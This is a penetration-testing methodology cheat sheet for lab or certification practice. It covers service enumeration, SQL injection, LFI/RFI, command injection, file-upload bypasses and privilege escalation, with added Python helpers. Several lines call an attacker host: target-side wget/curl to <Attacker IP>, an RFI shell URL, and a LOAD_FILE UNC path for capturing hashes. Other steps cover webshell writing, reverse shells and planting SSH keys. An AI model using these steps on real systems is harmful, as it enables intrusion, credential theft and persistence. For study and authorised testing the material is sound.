1. Network Enum
    1. 21/FTP
      1. Anonymous Login
        1. File Read
          1. Possibly exposes confidential information (configs, backups, credentials)
        2. File Write
          1. Possible file write that is reachable through the web server
          2. FTP file upload ==> execute from web == webshell (only works when the FTP root overlaps the web root)
      2. Password checking with creds you found through other enumeration
        1. Maybe brute-force
    2. 22/SSH
      1. Password checking with creds you found through other enumeration
      2. No brute-force (99.99% of the time it is a waste of time; find the creds elsewhere)
    3. 25/SMTP
      1. Username enumeration (VRFY/EXPN/RCPT TO), which can be chained to another vulnerability
    4. 80|443/HTTP/S
      1. Gobuster
        1. DIR
          1. For finding hidden directories and files
        2. DNS
          1. For finding subdomains
      2. NIKTO
        1. Quick overview of the web server: version, known files, common misconfigurations
    5. 139|445/SMB
      1. Null Session
        1. Accessing without creds (empty username and empty password)
        2. Read Permission
          1. Possible confidential file to be available
        3. Write Permission
          1. Possible file upload to execute through the web service
        4. Tools
          1. smbmap
            1. For checking which shares are available, with permission information
          2. smbclient
            1. For connecting to the SMB server and accessing the shares that are available
      2. Guest Session
        1. Accessing with any username (guest account enabled, blank password)
        2. Read Permission
          1. Possible confidential file to be available
        3. Write Permission
          1. Possible file upload to execute through the web service
        4. Tools
          1. smbmap
            1. For checking which shares are available, with permission information
          2. smbclient
            1. For connecting to the SMB server and accessing the shares that are available
    6. 135/RPC
      1. Username enumeration
      2. Tool
        1. rpcclient (talks SAMR/LSARPC over SMB named pipes on 139/445; 135 itself is only the endpoint mapper)
    7. 2049/NFS
      1. Open NFS share
        1. Read Access
          1. Possible confidential file to be available
        2. Write Access
          1. Possible file upload to execute through the web service
          2. With no_root_squash your writes land as root, so a SUID binary dropped on the share works for privesc too
        3. Tools
          1. showmount
            1. For listing the exports that are available
          2. mount
            1. For mounting an available share
    8. 3306/MYSQL
      1. If remote access is not blocked (no "not allowed to connect" error)
        1. Try login without a password (root with an empty password)
        2. Can be used for checking passwords found via a different service
        3. Tools
          1. mysql (client)
    9. 5985|5986/WINRM/S
      1. Remote Windows machine access (shell)
        1. With password
        2. With hash (pass-the-hash)
      2. Evil-WinRM (tool)
    10. 3389/RDP
      1. Try login with the creds you have
      2. Use different clients like Remmina if you see errors with another client (xfreerdp/rdesktop)
      3. Once logged in, use a shared folder to transfer files through Remmina
    11. 161/SNMP
      1. Access critical information about the target system (users, processes, installed software, network config), usually through a default community string like public
      2. Tools
        1. snmp-check
        2. snmpwalk
    12. 53/DNS
      1. Can be used for getting information about subdomains (zone transfer, reverse lookups)
    13. Null session via rpcclient: rpcclient -U '%' -N <IP> (empty user and password; then enumerate domain users and groups from the rpcclient prompt)
  2. Web-Enum
    1. Vulnerabilities Specific
      1. SQL injection
        1. TO SHELL
          1. FILE permission (the DB user needs the MySQL FILE privilege, and secure_file_priv must not be NULL or point elsewhere; otherwise LOAD_FILE returns NULL and OUTFILE errors out)
            1. By reading files
              1. SSH private keys
              2. To get information about users read /etc/passwd
              3. PayloadAllTheThings LFI list for finding other critical information
              4. Function
                1. LOAD_FILE('<FILE LOCATION>')
            2. By writing files
              1. Webshell writing in the web-hosting directory
              2. For Windows use \\<Attacker IP>\sharename\anyfilename as the LOAD_FILE argument to get the NetNTLM hash of the user running MySQL
                1. Catch it with the Responder tool
              3. Function
                1. into dumpfile '<FILE LOCATION>' (binary mode: raw bytes of a single row, use for binaries)
                2. into outfile '<FILE LOCATION>' (ASCII mode: escaped text, one line per row, fine for webshells)
              4. Webshells which can be used (in priority order)
                1. Windows
                  1. Oneliner
                  2. P0wnyShell
                  3. b374k
                2. Linux
                  1. Oneliner
                  2. P0wnyShell
                  3. b374k
              5. To find the web-hosting directory use the LFI list
        2. To get information about databases and tables
          1. Find usernames/passwords & try the same with other services like ssh, winrm, etc.
      2. Command Injection
        1. Check
          1. Vulnerability exists (out-of-band check; works even when the output is not reflected)
            1. Linux target
              1. Attacker
                1. tcpdump -i tun0 -n icmp
              2. Target
                1. ping -c 1 <Attacker IP>
            2. Windows target
              1. Attacker
                1. tcpdump -i tun0 -n icmp
              2. Target
                1. ping -n 1 <Attacker IP>
          2. Port which can be used for getting a LAN (reverse) shell
            1. Linux target
              1. Attacker
                1. python3 -m http.server <PORT to test>
              2. Target
                1. wget http://<Attacker IP>:<PORT>/test
                2. curl http://<Attacker IP>:<PORT>/test
            2. Windows target
              1. Attacker
                1. python3 -m http.server <PORT to test>
              2. Target
                1. powershell wget http://<Attacker IP>:<PORT>/test (wget is an alias of Invoke-WebRequest)
            3. Common ports which work most of the time (egress filtering usually allows them)
              1. Windows
                1. 21,22,25,80,443,445,53,123
                2. Priority 445
              2. Linux
                1. 21,22,25,80,443,445,53,123
                2. Priority 22
            4. If you received a connection on a port, use that port for the reverse shell
        2. Exploit
          1. Web-shell method
            1. Use the wget command to write a web-shell into the web-hosting directory
            2. Use the curl command to write a web-shell into the web-hosting directory
          2. LAN-shell method
            1. Only after checking that ping works and the port connection is verified (IMP)
            2. Windows
              1. mkpsrevshell
              2. PowerShell Nishang shell
              3. nc.exe upload
            3. Linux
              1. nc
              2. python
              3. ruby
              4. bash
              5. many more: Google "Linux reverse shell cheat sheet"
          3. SSH method
            1. Only works if the injected command runs as a real user, not a daemon/service account like apache or www-data (no usable home directory, nologin shell)
            2. Upload the attacker's public key to /home/<USER>/.ssh/authorized_keys
            3. If the folder does not exist create it ;) (keep .ssh at mode 700 and authorized_keys at 600; sshd ignores files that are group- or world-writable)
      3. LFI
        1. TO SHELL
          1. Log poisoning
            1. Try to access the logs of the different services running, i.e. ftp, smb, http
            2. If any log file is accessible, check whether your input is reflected in it (User-Agent, requested path, FTP username)
            3. To get log file locations use the LFI list
          2. Session poisoning
            1. Try accessing the session file
            2. To get the session file location
              1. PayloadAllTheThings
              2. <?php echo session_save_path(); ?>
              3. On most Linux machines the default is /var/lib/php/sessions (or /var/lib/php/session)
            3. Add your session id (IMP)
              1. Read your cookie value (PHPSESSID) and use it as the file name: sess_<PHPSESSID>
        2. Reading confidential files
          1. SSH private key
            1. For getting user home locations read /etc/passwd
          2. Config files
          3. Use the PayloadAllTheThings LFI list
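Added example (not from the original page) for the "read /etc/passwd to find user locations" step that appears in both the LFI and the SQL injection sections: it parses the passwd content you got back and emits the per-user files (SSH keys, histories) worth requesting next through the same LFI. The passwd content is a constructed sample, not from any real target, and the file list is my choice of common defaults:

```python
"""Added example, not from the original cheat sheet: turn an /etc/passwd read
through LFI (or LOAD_FILE) into the next list of files worth reading.

The passwd content below is constructed sample input, not from any target.
"""
from dataclasses import dataclass

# Constructed sample: what comes back from ?page=../../../../etc/passwd
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
mysql:x:112:118:MySQL Server,,,:/nonexistent:/bin/false
alice:x:1000:1000:Alice,,,:/home/alice:/bin/bash
bob:x:1001:1001::/home/bob:/bin/zsh
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
"""

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}

# Per-user files that commonly hold credentials or keys (usual default names).
INTERESTING = [
    ".ssh/id_rsa", ".ssh/id_ed25519", ".ssh/authorized_keys",
    ".bash_history", ".mysql_history", ".git-credentials",
]


@dataclass
class Account:
    name: str
    uid: int
    home: str
    shell: str

    @property
    def interactive(self) -> bool:
        # A login shell plus a real home directory is what the SSH method and
        # key theft need; service accounts fail one or both tests.
        return self.shell not in NOLOGIN_SHELLS and self.home.startswith(("/home/", "/root"))


def parse_passwd(text: str) -> list[Account]:
    """Parse passwd lines; tolerates the HTML and PHP warnings LFI output mixes in."""
    accounts = []
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) != 7 or not parts[2].isdigit():
            continue  # wrapper markup, warnings, blank lines
        accounts.append(Account(parts[0], int(parts[2]), parts[5], parts[6]))
    return accounts


def login_users(text: str) -> list[Account]:
    return [a for a in parse_passwd(text) if a.interactive]


def candidate_files(text: str) -> list[str]:
    """Absolute paths to try next through the same LFI, root first."""
    paths = []
    for acct in login_users(text):
        paths += [f"{acct.home.rstrip('/')}/{f}" for f in INTERESTING]
    return paths


if __name__ == "__main__":
    for a in login_users(SAMPLE_PASSWD):
        print(f"{a.name:10} uid={a.uid:<5} {a.home} {a.shell}")
    print("\n".join(candidate_files(SAMPLE_PASSWD)))
```

Feed the candidate paths back into the LFI parameter one by one; a private key that comes back is tried against 22/SSH with the matching username, which is the link the "Reading confidential files" item is after.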
      4. RFI
        1. Start with
          1. Port which can be used for getting a LAN shell (same egress check as for command injection)
            1. Windows or Linux target
              1. Attacker
                1. python3 -m http.server <PORT to test>
              2. Target
                1. Change the RFI param value to http://<Attacker_IP>:<PORT>/test and watch the http.server log for the hit
          2. Common ports which work most of the time
            1. Windows
              1. 21,22,25,80,443,445,53,123
              2. Priority 445
            2. Linux
              1. 21,22,25,80,443,445,53,123
              2. Priority 22
          3. RFI needs allow_url_include=On in php.ini (off by default); if no request ever arrives, fall back to LFI
        2. Once a usable port is found
          1. Windows
            1. Google "windows php reverse shell" and use that
            2. Oneliner is best
          2. Linux
            1. Google "Linux php reverse shell" and use that
            2. Oneliner is best
          3. TIPS
            1. The payload should be
              1. http://<Attacker_IP>:<PORT>/shell.php&cmd=whoami
            2. The payload should not be
              1. http://<Attacker_IP>:<PORT>/shell.php?cmd=whoami
            3. ? and & make a huge difference: with & the cmd parameter belongs to the target's own request, so the included shell finds it in $_GET; with ? it becomes the query string of the URL the target fetches from you, so your http.server receives cmd=whoami and the shell gets nothing
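Added example (not part of the original page) that demonstrates the ? versus & tip with Python's URL parser: it shows which parameters the target's PHP sees and which ones are sent to the attacker's web server instead, and builds the correct form. Host names, the page parameter and the shell file name are placeholders:

```python
"""Added example, not from the original cheat sheet: why the RFI payload must
end in `&cmd=...` rather than `?cmd=...`. Splits a request URL the way the
target's PHP and the attacker's http.server each see it.

Hosts, the include parameter name and the shell file name are placeholders.
"""
from urllib.parse import urlsplit, parse_qs


def split_rfi(request_url: str, param: str = "page") -> dict:
    """Return what lands in the target's $_GET, the URL it fetches from the
    attacker, and the query string the attacker's server therefore receives."""
    target_get = {k: v[0] for k, v in parse_qs(urlsplit(request_url).query).items()}
    fetched = target_get.get(param, "")
    attacker_get = {k: v[0] for k, v in parse_qs(urlsplit(fetched).query).items()}
    return {"target_get": target_get, "fetched": fetched, "attacker_get": attacker_get}


def rfi_url(victim: str, param: str, attacker: str, port: int,
            shell: str = "shell.php", cmd_param: str = "cmd", cmd: str = "id") -> str:
    """The correct form: the include URL is the whole param value, and cmd
    rides along as a separate parameter of the *target's* request."""
    return f"{victim}?{param}=http://{attacker}:{port}/{shell}&{cmd_param}={cmd}"


if __name__ == "__main__":
    good = "http://victim/index.php?page=http://10.10.14.1:445/shell.php&cmd=whoami"
    bad = "http://victim/index.php?page=http://10.10.14.1:445/shell.php?cmd=whoami"
    for url in (good, bad):
        print(url, split_rfi(url), sep="\n  ")
```

In the bad form the only thing your http.server logs is `GET /shell.php?cmd=whoami`, which is the tell-tale sign that the command never reached the included shell.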
      5. File Upload
        1. Uploading File
          1. php (Windows IIS & Apache httpd)
            1. Shells
              1. oneliner
              2. p0wny
              3. b374k
              4. msfvenom
            2. Bypasses
              1. Magic bytes bypass
                1. Modify the first few bytes (the signature) to a PNG signature, or prefix GIF89a, which is printable and easier to paste
              2. File extension bypass AKA double extensions
                1. Use a double extension as below (i.e. shell.php.png)
                  1. .php.png
                  2. .php.jpeg
                  3. .php.gif
                2. Similar extensions
                  1. .php/.php4/.php5/.phtml
              3. File size check (client-side check only)
                1. If the request sends a file size parameter, modify its value to something higher
                2. Use the oneliner or smaller shells
              4. Content-Type check
                1. Intercept the request with Burp
                2. Check the Content-Type header of the file part and modify it as below
                  1. image/png
                  2. image/jpeg
                  3. image/gif
                  4. text/plain
          2. asp/aspx (Windows IIS server)
            1. Shells
              1. Google "ASPX shell", use that webshell and follow the web-shell to LAN-shell method shown earlier
              2. Create an ASP/ASPX reverse shell with msfvenom
            2. Bypasses
              1. Content-Type check
                1. Intercept the request with Burp
                2. Check the Content-Type header of the file part and modify it as below
                  1. image/png
                  2. image/jpeg
                  3. image/gif
                  4. text/plain
              2. File size check (client-side check only)
                1. If the request sends a file size parameter, modify its value to something higher
                2. Use the oneliner or smaller shells
          3. jsp (Apache Tomcat)
            1. Shells
              1. Google "jsp shell", use that webshell and follow the web-shell to LAN-shell method shown earlier
              2. Create a JSP shell with msfvenom and use that
            2. Bypasses
              1. Same Content-Type and file size tricks as above
        2. Accessing File
          1. gobuster
            1. Do a dictionary-based attack to find all the hidden directories
            2. gobuster dir -w <wordlist> -u http://<IP>:<PORT>/ -t 100
          2. ffuf
            1. Fuzz the directory part of the path to find where the upload landed
            2. ffuf -w <wordlist> -u http://<IP>:<PORT>/FUZZ/filename_you_uploaded.php -t 100 -mc 200
            3. Use -mc 200 (match) rather than -fc 200, which would filter out exactly the hit you are looking for
          3. Best directory wordlists
            1. SecLists
              1. directory-list-2.3-big.txt
              2. raft wordlists
            2. dirbuster directory-list-2.3 big or medium
    2. CMS
      1. Finding
        1. Source code (generator meta tag, asset paths)
        2. Login page
        3. Comments
      2. Validating
        1. Don't chase XSS/CSRF-type exploits; focus on the vulnerability classes listed above (RCE, file upload, SQLi, LFI/RFI)
        2. Try finding GitHub exploits, as those are sometimes better
        3. Don't trust reported versions every time (banners are often outdated or faked)
      3. Exploiting
        1. Validate first
        2. Use the right port to get a LAN shell
        3. Follow the earlier checks and validation
    3. WordPress
      1. WPScan
        1. Read the manual (enumeration options for plugins, themes and users)
    4. Other
      1. Custom exploits come into play here: you might have to find the vulnerability on your own from the list above
      2. X-Forwarded-For header to access a 403 page (e.g. X-Forwarded-For: 127.0.0.1 when the restriction is IP based)
  3. Exploitation
    1. Modifications
      1. Automated exploits
        1. Paths are sometimes changed (target URL, upload directory)
        2. Using an alternative command or payload (SHELLCODE: regenerate for your own IP and port)
        3. Turning dev/PoC exploits into a final working one
        4. Solving errors (Python 2 vs 3, missing modules)
        5. Sometimes exploits contain proxy configurations (a Burp proxy left in; remove it or point it at your own)
      2. Instruction-based exploits
        1. Find an automated one
        2. Read and understand it completely
        3. Use logic: most of the time instruction-based exploits require fully understanding the concept
        4. Need fewer modifications, but still things like changing a path or finding the path
    2. Finding alternatives
      1. Search Google with the CVE number and find blogs, exploits from GitHub, papers etc.
      2. searchsploit will help to quickly list all of those
    3. Exploiting the right way
      1. Try all exploits if no version information is disclosed, as sometimes it is obfuscated
      2. Focus on critical vulnerabilities more
    4. Buffer Overflow
      1. Practice more on vanilla BoF AKA stack-based BoF
  4. Privilege Escalation
    1. Windows
      1. Manual approaches
        1. Check low-privilege shell permissions (whoami /priv) and try exploiting any abusable privilege (e.g. SeImpersonatePrivilege)
        2. Check software installation directories and find suspicious programs that are installed
        3. Check for weak permissions on services and their binpath
        4. Check for the Unquoted Service Path vulnerability
        5. Check for service registry permissions
        6. Check scheduled tasks
        7. Read names carefully
      2. Automated (best for beginners)
        1. PowerUp
        2. WinPEAS
        3. Windows Exploit Suggester
          1. Fails to check vulnerable software (it only compares the patch level from systeminfo against known OS CVEs)
          2. It's like using a sword for sewing ......
          3. Sometimes the machine creator forgot to use the latest OS, and this can be a lucky time for you: you might find something.
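Added example (not from the original page) for manual checks 3 and 4 above: it parses a service listing pasted out of a low-privilege shell (the shape of `wmic service get name,pathname,startmode /format:list`), flags unquoted binary paths containing spaces and lists the paths Windows would try first when starting the service. The listing below is a constructed sample with made-up service names:

```python
"""Added example, not from the original cheat sheet: find unquoted service
paths in a pasted service listing and compute where a planted binary would
be picked up.

SAMPLE_WMIC is constructed sample output in the Key=Value layout of
`wmic service get name,pathname,startmode /format:list`; names are made up.
"""
import re
from dataclasses import dataclass, field

SAMPLE_WMIC = """Name=Spooler
PathName=C:\\Windows\\System32\\spoolsv.exe
StartMode=Auto


Name=VulnSvc
PathName=C:\\Program Files\\Vuln App\\bin\\svc.exe -k run
StartMode=Auto


Name=GoodSvc
PathName="C:\\Program Files\\Good App\\good.exe" --service
StartMode=Auto


Name=OddSvc
PathName=C:\\Tools\\my tool\\agent.exe
StartMode=Manual
"""


@dataclass
class Service:
    name: str
    pathname: str
    startmode: str
    exe: str = ""
    unquoted: bool = False
    hijack_paths: list = field(default_factory=list)


def parse_wmic_list(text: str) -> list[Service]:
    """Key=Value lines, records separated by blank lines."""
    services, rec = [], {}
    for line in text.splitlines() + [""]:
        if "=" in line:
            k, v = line.split("=", 1)
            rec[k.strip().lower()] = v.strip()
        elif rec:
            services.append(Service(rec.get("name", ""), rec.get("pathname", ""), rec.get("startmode", "")))
            rec = {}
    return services


def analyse(svc: Service) -> Service:
    path = svc.pathname
    if path.startswith('"'):                      # properly quoted: nothing to do
        svc.exe = path[1:].split('"', 1)[0]
        return svc
    m = re.match(r"(.+?\.exe)", path, re.IGNORECASE)  # executable part, drop arguments
    svc.exe = m.group(1) if m else path
    if " " in svc.exe and not svc.exe.lower().startswith("c:\\windows\\"):
        svc.unquoted = True
        # CreateProcess tries every prefix that ends at a space, with ".exe" appended,
        # before it reaches the real binary; the first writable one wins.
        spaces = [i for i, ch in enumerate(svc.exe) if ch == " "]
        svc.hijack_paths = [svc.exe[:i] + ".exe" for i in spaces]
    return svc


def unquoted_services(text: str) -> list[Service]:
    return [s for s in map(analyse, parse_wmic_list(text)) if s.unquoted]


if __name__ == "__main__":
    for s in unquoted_services(SAMPLE_WMIC):
        print(f"{s.name} ({s.startmode}): {s.pathname}")
        for p in s.hijack_paths:
            print("   try writing:", p)
```

It is only exploitable if your user can write to the directory of one of the listed paths (check with icacls) and the service gets restarted: StartMode Auto plus a reboot, or start/stop rights on the service.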
    2. Unix
      1. Manual approaches
        1. Check for sudoers misconfigurations (sudo -l)
        2. Check for SUID permissions
        3. Check services running as root
        4. Check internal ports
          1. Keep an eye on 127.0.0.1
          2. Compare with the nmap result you have
        5. Check ports blocked by the firewall
        6. Check kernel version and exploits
      2. Automated (best for beginners)
        1. LSE (best)
        2. linPEAS
        3. LinEnum
        4. These are allowed for enumeration but not for exploitation, and in recent changes linPEAS has implemented exploitation too, which is not allowed. So simply find the vuln and exploit it manually (not just by executing linPEAS).
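Added example (not from the original page) for the internal-port checks above: it parses `ss -tlnp` output copied from the target and diffs it against the ports nmap showed from outside, separating loopback-only services (reachable only after port forwarding) from ones bound to all interfaces but hidden by the firewall. Both the ss output and the nmap port set are constructed samples:

```python
"""Added example, not from the original cheat sheet: the "check internal
ports / keep an eye on 127.0.0.1 / compare with your nmap result" steps as
code. Parses `ss -tlnp` output copied from the target and diffs it against
the ports nmap reported from outside.

Both inputs are constructed samples; NMAP_OPEN stands in for your own scan.
"""
import re
from dataclasses import dataclass

SAMPLE_SS = """State   Recv-Q  Send-Q   Local Address:Port    Peer Address:Port  Process
LISTEN  0       128            0.0.0.0:22           0.0.0.0:*      users:(("sshd",pid=812,fd=3))
LISTEN  0       511            0.0.0.0:80           0.0.0.0:*      users:(("nginx",pid=1201,fd=6))
LISTEN  0       80           127.0.0.1:3306         0.0.0.0:*      users:(("mysqld",pid=990,fd=21))
LISTEN  0       128          127.0.0.1:8080         0.0.0.0:*      users:(("java",pid=1450,fd=10))
LISTEN  0       4096           0.0.0.0:9000         0.0.0.0:*      users:(("php-fpm",pid=1012,fd=7))
LISTEN  0       128               [::]:22              [::]:*      users:(("sshd",pid=812,fd=4))
"""

NMAP_OPEN = {22, 80}   # ports nmap reported open from the attacker's side (constructed)

LINE = re.compile(r"^LISTEN\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+\s*(?P<proc>.*)$")


@dataclass(frozen=True)
class Listener:
    addr: str
    port: int
    process: str


def parse_ss(text: str) -> list[Listener]:
    out = []
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue                      # header or non-LISTEN lines
        proc = re.search(r'\("([^"]+)"', m["proc"])
        out.append(Listener(m["addr"].strip("[]"), int(m["port"]), proc.group(1) if proc else "?"))
    return out


def classify(listeners, nmap_open):
    """loopback: bound to 127.0.0.1/::1, needs a forward (ssh -L, chisel);
    firewalled: bound to all interfaces but never seen by nmap;
    external: already known from the outside scan."""
    result = {"loopback": [], "firewalled": [], "external": []}
    for l in listeners:
        if l.addr in ("127.0.0.1", "::1"):
            result["loopback"].append(l)
        elif l.port not in nmap_open:
            result["firewalled"].append(l)
        else:
            result["external"].append(l)
    return result


def privesc_targets(text: str, nmap_open) -> list[tuple[int, str, str]]:
    """(port, process, reason) for services that were invisible from outside."""
    c = classify(parse_ss(text), nmap_open)
    seen, out = set(), []
    for reason in ("loopback", "firewalled"):
        for l in c[reason]:
            if l.port not in seen:
                seen.add(l.port)
                out.append((l.port, l.process, reason))
    return sorted(out)


if __name__ == "__main__":
    for port, proc, why in privesc_targets(SAMPLE_SS, NMAP_OPEN):
        print(f"{port:>5}  {proc:<10} {why}")
```

A loopback-only mysqld or admin web app is the usual place where the password-reuse and "services running as root" items pay off; forward the port and enumerate it like any other service from the Network Enum list.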
  5. linkedin.com/in/rikunj/
  6. Telegram: https://t.me/R0B077
  7. Changelog: 1) added reference links on each topic 2) minor changes 3) added a couple more vulns and enum items